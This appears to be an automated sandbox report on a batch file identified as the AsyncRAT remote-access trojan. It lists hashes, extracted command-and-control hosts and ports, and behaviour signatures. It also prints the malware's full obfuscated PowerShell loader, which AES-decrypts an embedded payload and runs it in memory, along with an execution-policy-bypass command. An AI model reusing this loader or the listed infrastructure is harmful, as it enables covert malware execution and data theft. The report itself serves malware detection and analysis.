Analysis
-
max time kernel
48s -
max time network
153s -
platform
windows10-1703_x64 -
resource
win10-20220901-en -
resource tags
arch:x64arch:x86image:win10-20220901-enlocale:en-usos:windows10-1703-x64system -
submitted
01-02-2023 23:07
Static task
static1
Behavioral task
behavioral1
Sample
test.bat
Resource
win10-20220901-en
Behavioral task
behavioral2
Sample
test.bat
Resource
win7-20221111-en
General
-
Target
test.bat
-
Size
48KB
-
MD5
106c27af68b78b8670267a5eebfc8040
-
SHA1
a2bbfb23b51cb1f2bb213dfe410601bc7fa53875
-
SHA256
037565e9535d9521ad3ab3cfef0e6e91cad24b8e1cab83af7949dae67d95fb5c
-
SHA512
7de6b4f739f209c11cadee9360d5cb799b77bc5d4083b706a4d9bc21f501bb45e218715dbca6cd61811458b0efd190dba06dc04141650a48d91a305abf8e4600
-
SSDEEP
768:0oEB9ZEYgBM1D1gozT1RjnAKRc1pU9/gnEiCsfhh8pRA9buJsgsSxQ:jErqY7coz0JagnEtqh8pYbFgsSxQ
Malware Config
Extracted
asyncrat
0.5.7B
Default
mikludoykxx.ddns.net:6606
mikludoykxx.ddns.net:7707
mikludoykxx.ddns.net:8808
mikeludomax.ddns.net:6606
mikeludomax.ddns.net:7707
mikeludomax.ddns.net:8808
mikeludoyyxx.ddns.net:6606
mikeludoyyxx.ddns.net:7707
mikeludoyyxx.ddns.net:8808
AsyncMutex_6SI8OkPnk
-
delay
3
-
install
false
-
install_folder
%AppData%
Signatures
-
Async RAT payload 2 IoCs
Processes:
resource yara_rule behavioral1/memory/4688-141-0x0000018FCA550000-0x0000018FCA562000-memory.dmp asyncrat behavioral1/memory/4688-146-0x0000018FCB0B0000-0x0000018FCB0D2000-memory.dmp asyncrat -
Executes dropped EXE 1 IoCs
Processes:
test.bat.exepid process 4688 test.bat.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious behavior: EnumeratesProcesses 3 IoCs
Processes:
test.bat.exepid process 4688 test.bat.exe 4688 test.bat.exe 4688 test.bat.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
test.bat.exedescription pid process Token: SeDebugPrivilege 4688 test.bat.exe -
Suspicious use of WriteProcessMemory 6 IoCs
Processes:
cmd.exetest.bat.execmd.exedescription pid process target process PID 1660 wrote to memory of 4688 1660 cmd.exe test.bat.exe PID 1660 wrote to memory of 4688 1660 cmd.exe test.bat.exe PID 4688 wrote to memory of 4964 4688 test.bat.exe cmd.exe PID 4688 wrote to memory of 4964 4688 test.bat.exe cmd.exe PID 4964 wrote to memory of 2780 4964 cmd.exe powershell.exe PID 4964 wrote to memory of 2780 4964 cmd.exe powershell.exe
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\test.bat"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\test.bat.exe"test.bat.exe" -noprofile -windowstyle hidden -ep bypass -command $IDBqQ = [System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\test.bat').Split([Environment]::NewLine);foreach ($tScli in $IDBqQ) { if ($tScli.StartsWith(':: ')) { $NZVFu = $tScli.Substring(3); break; }; };$UPeLj = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($NZVFu);$OYivd = New-Object System.Security.Cryptography.AesManaged;$OYivd.Mode = [System.Security.Cryptography.CipherMode]::CBC;$OYivd.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$OYivd.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('9jIvbQQrMXVTkWeSQpp2Gn0UtOPOB2NCbMxKhJ10/nw=');$OYivd.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('krrHd9BxMDg+kQ5ve/eVnA==');$mtmak = $OYivd.CreateDecryptor();$UPeLj = $mtmak.TransformFinalBlock($UPeLj, 0, $UPeLj.Length);$mtmak.Dispose();$OYivd.Dispose();$Tiyba = New-Object System.IO.MemoryStream(, $UPeLj);$sbkvz = New-Object System.IO.MemoryStream;$CwlxS = New-Object System.IO.Compression.GZipStream($Tiyba, [IO.Compression.CompressionMode]::Decompress);$CwlxS.CopyTo($sbkvz);$CwlxS.Dispose();$Tiyba.Dispose();$sbkvz.Dispose();$UPeLj = $sbkvz.ToArray();$nxXvq = [System.Reflection.Assembly]::('daoL'[-1..-4] -join '')($UPeLj);$ZqEhy = $nxXvq.EntryPoint;$ZqEhy.Invoke($null, (, [string[]] ('')))2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c start /b powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\nmkgfi.bat"' & exit3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\nmkgfi.bat"'4⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\test.bat.exeFilesize
435KB
MD5f7722b62b4014e0c50adfa9d60cafa1c
SHA1f31c17e0453f27be85730e316840f11522ddec3e
SHA256ccc8538dd62f20999717e2bbab58a18973b938968d699154df9233698a899efa
SHA5127fe6a32f1a69ffdae5edc450a1fcbaed5eac805cb43abd86c5c54de59219f801c71d2a0c816ac182a5bfa568196463a351a86ac8d782423cab1e15648e5af8e4
-
C:\Users\Admin\AppData\Local\Temp\test.bat.exeFilesize
435KB
MD5f7722b62b4014e0c50adfa9d60cafa1c
SHA1f31c17e0453f27be85730e316840f11522ddec3e
SHA256ccc8538dd62f20999717e2bbab58a18973b938968d699154df9233698a899efa
SHA5127fe6a32f1a69ffdae5edc450a1fcbaed5eac805cb43abd86c5c54de59219f801c71d2a0c816ac182a5bfa568196463a351a86ac8d782423cab1e15648e5af8e4
-
memory/2780-154-0x0000000000000000-mapping.dmp
-
memory/4688-141-0x0000018FCA550000-0x0000018FCA562000-memory.dmpFilesize
72KB
-
memory/4688-139-0x0000018FCA540000-0x0000018FCA54E000-memory.dmpFilesize
56KB
-
memory/4688-132-0x0000018FCA5A0000-0x0000018FCA616000-memory.dmpFilesize
472KB
-
memory/4688-120-0x0000000000000000-mapping.dmp
-
memory/4688-146-0x0000018FCB0B0000-0x0000018FCB0D2000-memory.dmpFilesize
136KB
-
memory/4688-147-0x0000018FCB0F0000-0x0000018FCB10E000-memory.dmpFilesize
120KB
-
memory/4688-127-0x0000018FCA3F0000-0x0000018FCA412000-memory.dmpFilesize
136KB
-
memory/4688-155-0x0000018FCB250000-0x0000018FCB2CE000-memory.dmpFilesize
504KB
-
memory/4688-165-0x0000018FCA570000-0x0000018FCA57A000-memory.dmpFilesize
40KB
-
memory/4688-172-0x0000018FCB2D0000-0x0000018FCB330000-memory.dmpFilesize
384KB
-
memory/4688-179-0x0000018FCB330000-0x0000018FCB3C0000-memory.dmpFilesize
576KB
-
memory/4964-153-0x0000000000000000-mapping.dmp